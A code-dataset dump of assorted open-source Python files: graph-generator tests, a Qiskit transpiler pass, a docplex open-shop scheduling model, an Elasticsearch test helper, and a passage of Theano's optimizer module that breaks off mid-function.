ext
stringclasses
9 values
sha
stringlengths
40
40
content
stringlengths
3
1.04M
py
7dfcd8b7e61e1f90bc8d830b4835175742900bc1
"""Unit tests for the :mod:`networkx.generators.duplication` module. """ import pytest from networkx.generators.tests.test_duplication import TestDuplicationDivergenceGraph from networkx.generators.tests.test_duplication import TestPartialDuplicationGraph from graphscope.nx.generators.duplication import duplication_divergence_graph from graphscope.nx.generators.duplication import partial_duplication_graph from graphscope.nx.utils.compat import with_graphscope_nx_context @pytest.mark.usefixtures("graphscope_session") @with_graphscope_nx_context(TestDuplicationDivergenceGraph) class TestDuplicationDivergenceGraph: pass @pytest.mark.usefixtures("graphscope_session") @with_graphscope_nx_context(TestPartialDuplicationGraph) class TestPartialDuplicationGraph: pass
py
7dfcda9a499da2b71c881b7bde6767ce228d305e
#!/usr/bin/env python # # check.py : Run all the test cases. # # ==================================================================== # Copyright 2013 Justin Erenkrantz and Greg Stein # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ==================================================================== import sys import glob import subprocess import os if __name__ == '__main__': # get the test directory from the commandline, if set. if len(sys.argv) > 1: testdir = sys.argv[1] else: testdir = 'test' # define test executable paths if sys.platform == 'win32': SERF_RESPONSE_EXE = 'serf_response.exe' TEST_ALL_EXE = 'test_all.exe' else: SERF_RESPONSE_EXE = 'serf_response' TEST_ALL_EXE = 'test_all' SERF_RESPONSE_EXE = os.path.join(testdir, SERF_RESPONSE_EXE) TEST_ALL_EXE = os.path.join(testdir, TEST_ALL_EXE) # Find test responses and run them one by one for case in glob.glob(testdir + "/testcases/*.response"): print "== Testing %s ==" % (case) try: subprocess.check_call([SERF_RESPONSE_EXE, case]) except subprocess.CalledProcessError: print "ERROR: test case %s failed" % (case) print "== Running the unit tests ==" try: subprocess.check_call(TEST_ALL_EXE) except subprocess.CalledProcessError: print "ERROR: test(s) failed in test_all"
py
7dfcdcdace441781663db13ce3b236c51f793610
#!/usr/bin/env python ############################################################################### # Copyright Kitware Inc. and Contributors # Distributed under the Apache License, 2.0 (apache.org/licenses/LICENSE-2.0) # See accompanying Copyright.txt and LICENSE files for details ############################################################################### import numpy as np import sys from danesfield.geon_fitting.tensorflow import utils import pickle import plyfile import gdal import argparse def get_theta(length, r): if length < -0.8*r: return np.pi if length > 0.9*r: return 0 if length < 0: return np.pi-np.arccos((-1*length)/r) return np.arccos(length/r) def main(args): parser = argparse.ArgumentParser() parser.add_argument( '--input_geon', # default='../out_geon/D4_Curve_Geon.npy', type=str, help='input geon file.') parser.add_argument( '--input_dtm', # default='/dvmm-filer2/projects/Core3D/D4_Jacksonville/DTMs/D4_DTM.tif', type=str, help='Input dtm') # D3_UCSD D4_Jacksonville parser.add_argument( '--output_mesh', # default='../out_geon/D4_Curve_Mesh.ply', type=str, help='Output ply mesh file.') parser.add_argument( '--as-text', action='store_true', default=False, help='Output ply as ASCII instead of binary') args = parser.parse_args(args) original_dtm = gdal.Open(args.input_dtm, gdal.GA_ReadOnly) gt = original_dtm.GetGeoTransform() # captures origin and pixel size left = gdal.ApplyGeoTransform(gt, 0, 0)[0] top = gdal.ApplyGeoTransform(gt, 0, 0)[1] right = gdal.ApplyGeoTransform( gt, original_dtm.RasterXSize, original_dtm.RasterYSize)[0] bottom = gdal.ApplyGeoTransform( gt, original_dtm.RasterXSize, original_dtm.RasterYSize)[1] dtm = original_dtm.ReadAsArray() projection_model = {} projection_model['corners'] = [left, top, right, bottom] projection_model['project_model'] = gt projection_model['scale'] = 1.0 geon_model = [] all_vertex = [] all_face = [] center_of_mess, geon_model = pickle.load(open(args.input_geon, "rb")) for model in geon_model: if model['name'] == 'poly_cylinder': centroid, ex, ey, coefficients, min_axis_z,\ max_axis_z, ortho_x_min, ortho_x_max, fitted_indices_length, mean_diff = model[ 'model'] vertex, face = utils.get_poly_ply_volume(dtm, projection_model, centroid, ex, ey, coefficients, min_axis_z, max_axis_z, ortho_x_min, ortho_x_max, len(all_vertex), center_of_mess) if len(all_vertex) > 0: all_vertex.extend(vertex) all_face.extend(face) else: all_vertex = vertex all_face = face elif model['name'] == 'sphere': centroid, r, min_axis_z,\ max_axis_z, fitted_indices_length = model['model'] theta_max = get_theta(min_axis_z, r) theta_min = get_theta(max_axis_z, r) vertex, face = utils.get_sphere_volume(dtm, projection_model, centroid, r, theta_min, theta_max, len(all_vertex), center_of_mess) if len(all_vertex) > 0: all_vertex.extend(vertex) all_face.extend(face) else: all_vertex = vertex all_face = face for idx in range(len(all_vertex)): all_vertex[idx] = (all_vertex[idx][0]+center_of_mess[0], all_vertex[idx][1]+center_of_mess[1], all_vertex[idx][2]+center_of_mess[2]) all_vertex = np.array( all_vertex, dtype=[('x', 'f4'), ('y', 'f4'), ('z', 'f4')]) all_face = np.array(all_face, dtype=[( 'vertex_indices', 'i4', (3,)), ('red', 'u1'), ('green', 'u1'), ('blue', 'u1')]) el_vertex = plyfile.PlyElement.describe(all_vertex, 'vertex') el_face = plyfile.PlyElement.describe(all_face, 'face') plyfile.PlyData([el_vertex, el_face], text=args.as_text).write(args.output_mesh) if __name__ == "__main__": main(sys.argv[1:])
py
7dfcdfd86698d12db59ae2053dbac584ae7fbdb3
# Licensed to the Apache Software Foundation (ASF) under one # or more contributor license agreements. See the NOTICE file # distributed with this work for additional information # regarding copyright ownership. The ASF licenses this file # to you under the Apache License, Version 2.0 (the # "License"); you may not use this file except in compliance # with the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, # software distributed under the License is distributed on an # "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY # KIND, either express or implied. See the License for the # specific language governing permissions and limitations # under the License. import os from pulsar import Client, AuthenticationToken client = Client(os.environ.get('SERVICE_URL'), authentication=AuthenticationToken(os.environ.get('AUTH_PARAMS'))) client.close()
py
7dfcdfe137a9d5bc6919ebdee656b2d487126806
import sys, argparse def get_args(): parser = argparse.ArgumentParser() parser.add_argument("--seed", type=int, default=0, help="seed") parser.add_argument("--render", action="store_true") parser.add_argument("--dataset_folder", type=str, default="../input_data/robo", help="folder for bodies") parser.add_argument("--train_bodies", type=str, default="", help="Format: --train_bodies=0,100,300") parser.add_argument("--test_bodies", type=str, default="", help="Format: --test_bodies=0,100,300") parser.add_argument("--robo_bodies", type=str, default="", help="RoboGrammar rules.") parser.add_argument("--test_steps", type=int, default=1000, help="total time steps for testing.") parser.add_argument("--train_steps", type=float, default=2e6, help="total time steps for training.") parser.add_argument("--eval_steps", type=float, default=1e5, help="eval policy every # steps during training.") parser.add_argument("--learning_rate", type=float, default=3e-5, help="Setting learning rate.") parser.add_argument("--num_venvs", type=int, default=16, help="How many envs you want to vectorize (train together).") parser.add_argument("--with_bodyinfo", action="store_true") parser.add_argument("--stack_frames", type=int, default=1, help="How many frames do you want to stack for training and testing. ") parser.add_argument("--vec_normalize", action="store_true", help="use VecNormalize") parser.add_argument("--with_checkpoint", action="store_true", help="save checkpoints along training.") parser.add_argument("--threshold_threshold", type=float, default=0.0, help="activation function used in training. 0.0 is equivalent to ReLU") parser.add_argument("--threshold_value", type=float, default=0.0, help="activation function used in training. 0.0 is equivalent to ReLU") parser.add_argument("--initialize_weights_from", type=str, default="", help="better initialization from model file.") parser.add_argument("--model_filename", type=str, default="", help="model to test.") parser.add_argument("--body_folder", type=str, default="../input_data/bodies", help="folders that contains body xml files") parser.add_argument("--topology_wrapper", type=str, default="", help="Switch for different experiments. Could be: same|diff") parser.add_argument("--wrapper_case", type=str, default="Walker2DHopperWrapper", help="special wrapper for different experiments.") parser.add_argument("--realign_method", type=str, default="", help="Only works when --topologies=same. See exp_012's hypothesis. Could be: general_only|joints_only|feetcontact_only|...") parser.add_argument("--custom_align_max_joints", type=int, default=10, help="For CustomAlignWrapper. 8 for Vanilla4, 10 for RandomBody.") parser.add_argument("--custom_alignment", type=str, default="", help="For CustomAlignWrapper. e.g. '0,1,2;0,1,2;2,0,1;1,0,2' for 4 observations with size of 3. ") # parser.add_argument("--misalign_obs", action="store_true", help="first misalignment test.") # parser.add_argument("--random_align_obs", action="store_true", help="second misalignment test.") # parser.add_argument("--preserve_header", action="store_true", help="preserve_header when misalign others") parser.add_argument("--random_even_same_body", action="store_true", help="all training bodies have different orders in observation.") # parser.add_argument("--preserve_feet_contact", action="store_true", help="preserve_feet_contact when misalign the rest (only obs of joints)") parser.add_argument("--disable_reordering", action="store_true", help="For MutantWrapper, add this to disable reordering even when use MutantWrapper. So at test time, when rendering, we can see the coloring.") parser.add_argument("--ga_job_id", type=int, default=-1, help="For GA, the individual id.") parser.add_argument("--ga_parent_id", type=int, default=-1, help="For GA, the individual id.") parser.add_argument("--pns", action="store_true", help="Use Mlp with PNS instead of MlpPolicy.") parser.add_argument("--pns_init", action="store_true", help="By default, first 8 numbers in observation is general information. Init with an I matrix in sensor weight.") parser.add_argument("--one_snapshot_at", type=int, default=-1, help="For save images, only save one picture at certain step.") parser.add_argument("--skip_solved_threshold", type=float, default=-1, help="Define a value for solved, skip training on that body until everyone pass that threshold. -1 for disabling this function.") parser.add_argument("-tb", "--tensorboard", type=str, default="tensorboard", help="Folder name for tensorboard data.") if "/tests/test_" in sys.argv[0]: # hack: unittest from file, standalone args = parser.parse_args(sys.argv[1:]) sys.argv = [sys.argv[0]] if sys.argv[0]=="python -m unittest": # hack: unittest from command line args = parser.parse_args([]) else: args = parser.parse_args() args.train_steps = int(args.train_steps) args.train_bodies_str = args.train_bodies args.train_bodies = str2array(args.train_bodies_str) args.test_bodies_str = args.test_bodies args.test_bodies = str2array(args.test_bodies_str) args.robo_bodies_str = args.robo_bodies args.robo_bodies = str2array(args.robo_bodies_str) return args def str2array(_str, separation=","): assert isinstance(_str, str) array = [] if len(_str) > 0: array = [int(x) for x in _str.split(separation)] return array
py
7dfce01f39192d35a702d83d272c586666b50d39
import torch def ResNet18(): return torch.hub.load('pytorch/vision:v0.6.0', 'resnet18', pretrained=True)
py
7dfce0e5867c902726b245e812fa4188955938a8
import numpy as np class Normalizer(object): def __init__(self, input_dims, init_mean, init_var, scale_factor=1, epsilon=1e-3, clip_range=None, activated=False): self.activated = activated self.input_dims = input_dims self.sample_count = 0 self.history = [] self.history_mean = init_mean self.history_var = init_var if self.history_mean is None: self.history_mean = np.zeros(self.input_dims) if self.history_var is None: self.history_var = np.ones(self.input_dims) assert self.history_mean.shape == (self.input_dims,) assert self.history_var.shape == (self.input_dims,) self.epsilon = epsilon*np.ones(self.input_dims) if clip_range is None: clip_range = 1e3 self.input_clip_range = (-clip_range*np.ones(self.input_dims), clip_range*np.ones(self.input_dims)) self.scale_factor = scale_factor def store_history(self, *args): self.history.append(*args) # update mean and var for z-score normalization def update_mean(self): if len(self.history) == 0: return new_sample_num = len(self.history) new_history = np.array(self.history, dtype=np.float) new_mean = np.mean(new_history, axis=0) new_var = np.sum(np.square(new_history - new_mean), axis=0) new_var = (self.sample_count * np.square(self.history_var) + new_var) new_var /= (new_sample_num + self.sample_count) self.history_var = np.sqrt(new_var) new_mean = (self.sample_count * self.history_mean + new_sample_num * new_mean) new_mean /= (new_sample_num + self.sample_count) self.history_mean = new_mean self.sample_count += new_sample_num self.history.clear() # pre-process inputs, currently using max-min-normalization def __call__(self, inputs): if self.activated: inputs = (inputs - self.history_mean) / (self.history_var+self.epsilon) inputs = np.clip(inputs, self.input_clip_range[0], self.input_clip_range[1]) return self.scale_factor*inputs
py
7dfce11a92e7691b17526ae51da326077fa8b70c
import numpy as np import torch import torch.nn as nn from torch.autograd import Variable from onnx2keras import onnx_to_keras, check_torch_keras_error import onnx class LayerTest(nn.Module): def __init__(self, kernel_size=3, padding=1, stride=1): super(LayerTest, self).__init__() self.pool = nn.AvgPool3d(kernel_size=kernel_size, padding=padding, stride=stride) def forward(self, x): x = self.pool(x) return x if __name__ == '__main__': max_error = 0 for kernel_size in [1, 3, 5, 7]: for padding in [0, 1, 3]: for stride in [1, 2, 3, 4]: # RuntimeError: invalid argument 2: pad should be smaller than half of kernel size, but got padW = 1, padH = 1, kW = 1, if padding > kernel_size / 2: continue model = LayerTest(kernel_size=kernel_size, padding=padding, stride=stride) model.eval() input_np = np.random.uniform(0, 1, (1, 3, 20, 224, 224)) input_var = Variable(torch.FloatTensor(input_np)) torch.onnx.export(model, input_var, "_tmpnet.onnx", verbose=True, input_names=['test_in'], output_names=['test_out']) onnx_model = onnx.load('_tmpnet.onnx') k_model = onnx_to_keras(onnx_model, ['test_in']) error = check_torch_keras_error(model, k_model, input_np) print('Error:', error) if max_error < error: max_error = error print('Max error: {0}'.format(max_error))
py
7dfce1771b7bfa61f60f865baf11d7096f518e54
#!/usr/bin/env python """ A setuptools based setup module. See: - https://packaging.python.org/en/latest/distributing.html - https://github.com/pypa/sampleproject To install: 1. Setup pypi by creating ~/.pypirc [distutils] index-servers = pypi pypitest [pypi] username= password= [pypitest] username= password= 2. Create the dist python3 setup.py sdist bdist_wheel 3. Push twine upload dist/* """ import os import re # Always prefer setuptools over distutils from setuptools import setup, find_packages ROOT = os.path.dirname(__file__) def get_version(): """ Reads the version from ersatz's __init__.py file. We can't import the module because required modules may not yet be installed. """ VERSION_RE = re.compile(r'''__version__ = ['"]([0-9.]+)['"]''') init = open(os.path.join(ROOT, 'ersatz', '__init__.py')).read() return VERSION_RE.search(init).group(1) def get_description(): DESCRIPTION_RE = re.compile(r'''__description__ = ['"](.*)['"]''') init = open(os.path.join(ROOT, 'ersatz', '__init__.py')).read() return DESCRIPTION_RE.search(init).group(1) setup( name = 'ersatz', # Versions should comply with PEP440. For a discussion on single-sourcing # the version across setup.py and the project code, see # https://packaging.python.org/en/latest/single_source_version.html version = get_version(), description = get_description(), long_description = "Ersatz is a simple, language-agnostic toolkit for both training sentence segmentation models as well as providing pretrained, " "high-performing models for sentence segmentation in a multilingual setting.", # The project's main homepage. url = 'https://github.com/rewicks/ersatz', author = 'Rachel Wicks', author_email='[email protected]', maintainer_email='[email protected]', license = 'Apache License 2.0', python_requires = '>=3', # See https://pypi.python.org/pypi?%3Aaction=list_classifiers classifiers = [ # How mature is this project? Common values are # 3 - Alpha # 4 - Beta # 5 - Production/Stable 'Development Status :: 5 - Production/Stable', # Indicate who your project is intended for 'Intended Audience :: Developers', 'Intended Audience :: Science/Research', 'Topic :: Scientific/Engineering', 'Topic :: Scientific/Engineering :: Artificial Intelligence', 'Topic :: Text Processing', # Pick your license as you wish (should match "license" above) 'License :: OSI Approved :: Apache Software License', # Specify the Python versions you support here. In particular, ensure # that you indicate whether you support Python 2, Python 3 or both. 'Programming Language :: Python :: 3 :: Only', ], # What does your project relate to? keywords = ['sentence segmenation, data processing, preprocessing, evaluation, NLP, natural language processing, computational linguistics'], # Which packages to deploy (currently sacrebleu, sacrebleu.matrics and sacrebleu.tokenizers)? packages = find_packages(), # Mark ersatz (and recursively all its sub-packages) as supporting mypy type hints (see PEP 561). package_data={"ersatz": ["py.typed"]}, # List run-time dependencies here. These will be installed by pip when # your project is installed. For an analysis of "install_requires" vs pip's # requirements files see: # https://packaging.python.org/en/latest/requirements.html install_requires = [ 'typing;python_version<"3.5"', 'torch==1.7.1', 'sentencepiece==0.1.95', 'tensorboard==2.4.1', 'progressbar2' ], # List additional groups of dependencies here (e.g. development # dependencies). You can install these using the following syntax, # for example: # $ pip install -e .[dev,test] extras_require = {}, # To provide executable scripts, use entry points in preference to the # "scripts" keyword. Entry points provide cross-platform support and allow # pip to create the appropriate form of executable for the target platform. entry_points={ 'console_scripts': [ 'ersatz = ersatz.split:main', 'ersatz_train = ersatz.trainer:main', 'ersatz_score = ersatz.score:main', 'ersatz_preprocess = ersatz.dataset:main' ], }, )
py
7dfce1cd5eb531e8eb235dbd1fa36bf32645fea7
# This code is part of Qiskit. # # (C) Copyright IBM 2017, 2019. # # This code is licensed under the Apache License, Version 2.0. You may # obtain a copy of this license in the LICENSE.txt file in the root directory # of this source tree or at http://www.apache.org/licenses/LICENSE-2.0. # # Any modifications or derivative works of this code must retain this # copyright notice, and modified files need to carry a notice indicating # that they have been altered from the originals. """Convert a circuit in ``U3, CX`` to ``Rx, Ry, Rxx`` without unrolling or simplification.""" import warnings from qiskit.transpiler.basepasses import TransformationPass from qiskit.exceptions import QiskitError from qiskit.converters import circuit_to_dag from qiskit.circuit.library.standard_gates import U3Gate, CXGate from qiskit.transpiler.passes import Unroller from qiskit.quantum_info.synthesis.one_qubit_decompose import OneQubitEulerDecomposer from qiskit.quantum_info.synthesis.ion_decompose import cnot_rxx_decompose class MSBasisDecomposer(TransformationPass): """Convert a circuit in ``U3, CX`` to ``Rx, Ry, Rxx`` without unrolling or simplification.""" supported_input_gates = (U3Gate, CXGate) def __init__(self, basis_gates): """Deprecated MSBasisDecomposer initializer. Args: basis_gates (list[str]): Target basis names, e.g. `['rx', 'ry', 'rxx', 'ms']` . """ warnings.warn( "The qiskit.transpiler.passes.basis.MSBasisDecomposer class is " "deprecated as of 0.16.0, and will be removed no earlier " "than 3 months after that release date. You should use the " "qiskit.transpiler.passes.basis.BasisTranslator class " "instead.", DeprecationWarning, stacklevel=2, ) super().__init__() self.basis_gates = basis_gates # Require all gates be unrolled to either a basis gate or U3,CX before # running the decomposer. input_basis = set(basis_gates).union(["u3", "cx"]) self.requires = [Unroller(list(input_basis))] def run(self, dag): """Run the MSBasisDecomposer pass on `dag`. Replace U3,CX nodes in input dag with equivalent Rx,Ry,Rxx gates. Args: dag(DAGCircuit): input dag Raises: QiskitError: if input dag includes gates outside U3,CX. Returns: DAGCircuit: output dag """ one_q_decomposer = OneQubitEulerDecomposer(basis="XYX") cnot_decomposition = cnot_rxx_decompose() for node in dag.op_nodes(): basic_insts = ["measure", "reset", "barrier", "snapshot", "delay"] if node.name in basic_insts: # TODO: this is legacy behavior. basic_insts should be removed and these # instructions should be part of the device-reported basis. Currently, no # backend reports "measure", for example. continue if node.name in self.basis_gates: # If already a base, ignore. continue if not isinstance(node.op, self.supported_input_gates): raise QiskitError( "Cannot convert the circuit to the given basis, %s. " "No rule to expand instruction %s." % (str(self.basis_gates), node.op.name) ) if isinstance(node.op, U3Gate): replacement_circuit = one_q_decomposer(node.op) elif isinstance(node.op, CXGate): # N.B. We can't circuit_to_dag once outside the loop because # substitute_node_with_dag will modify the input DAG if the # node to be replaced is conditional. replacement_circuit = cnot_decomposition else: raise QiskitError( "Unable to handle instruction (%s, %s)." % (node.op.name, type(node.op)) ) replacement_dag = circuit_to_dag(replacement_circuit) # N.B. wires kwarg can be omitted for both 1Q and 2Q substitutions. # For 1Q, one-to-one mapping is always correct. For 2Q, # cnot_rxx_decompose follows convention of control as q[0], target # as q[1], which matches qarg order in CX node. dag.substitute_node_with_dag(node, replacement_dag) return dag
py
7dfce2960b8fad0e6d21f9985f189326c80e1444
# -------------------------------------------------------------------------- # Source file provided under Apache License, Version 2.0, January 2004, # http://www.apache.org/licenses/ # (c) Copyright IBM Corp. 2015, 2016 # -------------------------------------------------------------------------- """ This problem can be described as follows: a finite set of operations has to be processed on a given set of machines. Each operation has a specific processing time during which it may not be interrupted. Operations are grouped in jobs, so that each operation belongs to exactly one job. Furthermore, each operation requires exactly one machine for processing. The objective of the problem is to schedule all operations, i.e., to determine their start time, so as to minimize the maximum completion time (makespan) given the additional constraints that: operations which belong to the same job and operations which use the same machine cannot be processed simultaneously. This problem is similar that the one proposed in flow_shop.py except that job operations can be executed in any order. Please refer to documentation for appropriate setup of solving configuration. """ from docplex.cp.model import * import os #----------------------------------------------------------------------------- # Initialize the problem data #----------------------------------------------------------------------------- # Read the input data file. # Available files are openshop_default, and different openshop_XXXX. # First line contains the number of jobs, and the number of machines. # The rest of the file consists of one line per job that contains the list of # operations given as durations for each machines. filename = os.path.dirname(os.path.abspath(__file__)) + '/data/openshop_default.data' with open(filename, 'r') as file: NB_JOBS, NB_MACHINES = [int(v) for v in file.readline().split()] JOB_DURATIONS = [[int(v) for v in file.readline().split()] for i in range(NB_JOBS)] #----------------------------------------------------------------------------- # Build the model #----------------------------------------------------------------------------- # Create model mdl = CpoModel() # Create one interval variable per job operation job_operations = [[interval_var(size=JOB_DURATIONS[j][m], name='J{}-M{}'.format(j,m)) for m in range(NB_MACHINES)] for j in range(NB_JOBS)] # All operations executed on the same machine must no overlap mdl.add(no_overlap(job_operations[i][j] for j in range(NB_MACHINES)) for i in range(NB_JOBS)) # All operations executed for the same job must no overlap mdl.add(no_overlap(job_operations[i][j] for i in range(NB_JOBS)) for j in range(NB_MACHINES)) # Minimization completion time mdl.add(minimize(max(end_of(job_operations[i][j]) for i in range(NB_JOBS) for j in range(NB_MACHINES)))) #----------------------------------------------------------------------------- # Solve the model and display the result #----------------------------------------------------------------------------- # Solve model print('Solving model...') res = mdl.solve(FailLimit=10000,TimeLimit=10) print('Solution: ') res.print_solution() # Display solution import docplex.cp.utils_visu as visu if res and visu.is_visu_enabled(): visu.timeline('Solution for open-shop ' + filename) visu.panel('Jobs') for i in range(NB_JOBS): visu.sequence(name='J' + str(i), intervals=[(res.get_var_solution(job_operations[i][j]), j, 'M' + str(j)) for j in range(NB_MACHINES)]) visu.panel('Machines') for j in range(NB_MACHINES): visu.sequence(name='M' + str(j), intervals=[(res.get_var_solution(job_operations[i][j]), j, 'J' + str(i)) for i in range(NB_JOBS)]) visu.show()
py
7dfce29da8239f717e6e8c2fe66fc89c67a5e702
import time from unittest import TestCase from nose import SkipTest import pyelasticsearch from elasticutils import get_es, S class ElasticTestCase(TestCase): """Superclass for ElasticSearch-using test cases. :cvar index_name: string; name of the index to use :cvar skip_tests: bool; if ElasticSearch isn't available, then this is True and therefore tests should be skipped for this class For examples of usage, see the other ``test_*.py`` files. """ index_name = 'elasticutilstest' mapping_type_name = 'elasticutilsmappingtype' es_settings = { 'urls': ['http://localhost:9200'] } skip_tests = False @classmethod def setup_class(cls): """Class setup for tests. Checks to see if ES is running and if not, sets ``skip_test`` to True on the class. """ # Note: TestCase has no setup_class try: get_es().health() except pyelasticsearch.exceptions.ConnectionError: cls.skip_tests = True @classmethod def teardown_class(cls): """Class tear down for tests.""" if cls.skip_tests: return cls.cleanup_index() def setUp(self): """Set up a single test. :raises SkipTest: if ``skip_tests`` is True for this class/instance """ if self.skip_tests: raise SkipTest super(ElasticTestCase, self).setUp() @classmethod def get_es(cls): return get_es(**cls.es_settings) @classmethod def get_s(cls, mapping_type=None): if mapping_type is not None: s = S(mapping_type) else: s = S() return (s.es(**cls.es_settings) .indexes(cls.index_name) .doctypes(cls.mapping_type_name)) @classmethod def create_index(cls): es = cls.get_es() try: es.delete_index(cls.index_name) except pyelasticsearch.exceptions.ElasticHttpNotFoundError: pass es.create_index(cls.index_name) @classmethod def index_data(cls, data, index=None, doctype=None, create_index=False): index = index or cls.index_name doctype = doctype or cls.mapping_type_name es = cls.get_es() if create_index: cls.create_index() # TODO: change this to a bulk index for item in data: es.index(index, doctype, item, id=item['id']) cls.refresh() @classmethod def cleanup_index(cls): es = cls.get_es() try: es.delete_index(cls.index_name) except pyelasticsearch.exceptions.ElasticHttpNotFoundError: pass @classmethod def refresh(cls, timesleep=0): """Refresh index after indexing. This refreshes the index specified by `self.index_name`. :arg timesleep: int; number of seconds to sleep after telling ElasticSearch to refresh """ cls.get_es().refresh(cls.index_name) if timesleep: time.sleep(timesleep) def facet_counts_dict(qs, field): return dict((t['term'], t['count']) for t in qs.facet_counts()[field])
py
7dfce3cf045c5d2bbac9718dbd41e5afa3c380ac
""" Defines the base class for optimizations as well as a certain amount of useful generic optimization tools. """ import copy import logging import sys import time import numpy import graph from fg import InconsistencyError import op import utils import unify import toolbox import theano from theano import config from theano.gof.python25 import any, all, deque from theano.configparser import AddConfigVar, BoolParam #if sys.version_info[:2] >= (2,5): # from collections import defaultdict _logger = logging.getLogger('theano.gof.opt') AddConfigVar('time_seq_optimizer', "Should SeqOptimizer print the time taked by each of its optimizer", BoolParam(False), in_c_key=False) AddConfigVar('time_eq_optimizer', "Should EquilibriumOptimizer print the time taken by each optimizer", BoolParam(False), in_c_key=False) import destroyhandler as dh import traceback _optimizer_idx = [0] def _list_of_nodes(fgraph): return list(graph.io_toposort(fgraph.inputs, fgraph.outputs)) class Optimizer(object): """WRITEME An L{Optimizer} can be applied to an L{FunctionGraph} to transform it. It can represent an optimization or in general any kind of transformation you could apply to an L{FunctionGraph}. """ def __hash__(self): if not hasattr(self, '_optimizer_idx'): self._optimizer_idx = _optimizer_idx[0] _optimizer_idx[0] += 1 return self._optimizer_idx def apply(self, fgraph): """WRITEME Applies the optimization to the provided L{FunctionGraph}. It may use all the methods defined by the L{FunctionGraph}. If the L{Optimizer} needs to use a certain tool, such as an L{InstanceFinder}, it can do so in its L{add_requirements} method. """ pass def optimize(self, fgraph, *args, **kwargs): """WRITEME This is meant as a shortcut to:: opt.add_requirements(fgraph) opt.apply(fgraph) """ self.add_requirements(fgraph) return self.apply(fgraph, *args, **kwargs) def __call__(self, fgraph): """WRITEME Same as self.optimize(fgraph) """ return self.optimize(fgraph) def add_requirements(self, fgraph): """WRITEME Add features to the fgraph that are required to apply the optimization. For example: fgraph.attach_feature(History()) fgraph.attach_feature(MyFeature()) etc. """ pass def print_summary(self, stream=sys.stdout, level=0, depth=-1): name = getattr(self, 'name', None) print >> stream, "%s%s %s id=%i" % ( (' ' * level), self.__class__.__name__, name, id(self)) def print_profile(self, prof): if prof is not None: raise NotImplementedError( "The function print_profile must be overrided if the" " optimizer return profiling information.") class FromFunctionOptimizer(Optimizer): """WRITEME""" def __init__(self, fn): self.apply = fn def add_requirements(self, fgraph): # Added by default #fgraph.attach_feature(toolbox.ReplaceValidate()) pass def print_summary(self, stream=sys.stdout, level=0, depth=-1): print >> stream, "%s%s id=%i" % ( ' ' * level, str(self.apply), id(self)) def __call__(self, *args, **kwargs): return self.fn(*args, **kwargs) def optimizer(f): """decorator for FromFunctionOptimizer""" rval = FromFunctionOptimizer(f) rval.__name__ = f.__name__ return rval class SeqOptimizer(Optimizer, list): #inherit from Optimizer first to get Optimizer.__hash__ """WRITEME Takes a list of L{Optimizer} instances and applies them sequentially. """ @staticmethod def warn(exc, self, optimizer): """Default failure_callback for SeqOptimizer """ _logger.error("SeqOptimizer apply %s" % str(optimizer)) _logger.error("Traceback:") _logger.error(traceback.format_exc()) if config.on_opt_error == 'raise': raise exc def __init__(self, *opts, **kw): """WRITEME""" if len(opts) == 1 and isinstance(opts[0], (list, tuple)): opts = opts[0] self[:] = opts self.failure_callback = kw.pop('failure_callback', None) def apply(self, fgraph): """WRITEME Applies each L{Optimizer} in self in turn. """ l = [] if fgraph.profile: validate_before = fgraph.profile.validate_time nb_node_before = len(fgraph.apply_nodes) sub_profs = [] for optimizer in self: try: t0 = time.time() sub_prof = optimizer.optimize(fgraph) l.append(float(time.time() - t0)) sub_profs.append(sub_prof) except AssertionError: # do not catch Assertion failures raise except Exception, e: if self.failure_callback: self.failure_callback(e, self, optimizer) continue else: raise if config.time_seq_optimizer: print "SeqOptimizer", if hasattr(self,"name"): print self.name, elif hasattr(self,"__name__"): print self.__name__, print " time %.3fs for %d/%d nodes before/after optimization"%(sum(l),nb_node_before,len(fgraph.apply_nodes)) print " time %.3fs for validate " % ( fgraph.profile.validate_time - validate_before) ll=[] for opt in self: if hasattr(opt,"__name__"): ll.append((opt.__name__,opt.__class__.__name__)) else: ll.append((opt.name,opt.__class__.__name__)) lll=zip(l,ll) def cmp(a,b): if a[0]==b[0]: return 0 if a[0]<b[0]: return -1 return 1 lll.sort(cmp) for (t, opt) in lll[::-1]: print ' %.6fs - %s' % (t, opt) print if fgraph.profile: validate_time = fgraph.profile.validate_time - validate_before else: validate_time = None return (self, l, validate_time, nb_node_before, len(fgraph.apply_nodes), sub_profs) def __eq__(self, other): #added to override the list's __eq__ implementation return id(self) == id(other) def __neq__(self, other): #added to override the list's __neq__ implementation return id(self) != id(other) def __str__(self): return "SeqOpt(%s)" % list.__str__(self) def __repr__(self): return list.__repr__(self) def print_summary(self, stream=sys.stdout, level=0, depth=-1): name = getattr(self, 'name', None) print >> stream, "%s%s %s id=%i" % ( (' ' * level), self.__class__.__name__, name, id(self)) # This way, -1 will do all depth if depth != 0: depth -= 1 for opt in self: opt.print_summary(stream, level=(level + 2), depth=depth) @staticmethod def print_profile(stream, prof, level=0): (opts, prof, validate_time, nb_node_before, nb_node_after, sub_profs) = prof blanc = (' ' * level) print >> stream, blanc, "SeqOptimizer", if hasattr(opts, "name"): print >> stream, blanc, opts.name, elif hasattr(opts, "__name__"): print >> stream, blanc, opts.__name__, print >> stream, (" time %.3fs for %d/%d nodes" " before/after optimization" % ( sum(prof), nb_node_before, nb_node_after)) print >> stream, blanc, " %.3fs for fgraph.validate()" % (validate_time) if level == 0: print >> stream, blanc, " time - (name, class, index)" ll = [] for opt in opts: if hasattr(opt, "__name__"): ll.append((opt.__name__, opt.__class__.__name__, opts.index(opt))) else: ll.append((opt.name, opt.__class__.__name__, opts.index(opt))) lll = zip(prof, ll) def cmp(a, b): if a[0] == b[0]: return 0 elif a[0] < b[0]: return -1 return 1 lll.sort(cmp) for (t, opt) in lll[::-1]: #if t < 1: # continue print >> stream, blanc, ' %.6fs - %s' % (t, opt) if sub_profs[opt[-1]]: opts[opt[-1]].print_profile(stream, sub_profs[opt[-1]], level=level + 1) print >> stream @staticmethod def merge_profile(prof1, prof2): """ Merge 2 profiles returned by this cass apply() fct. """ new_t = [] new_l = [] new_sub_profile = [] #merge common(same object) opt for l in 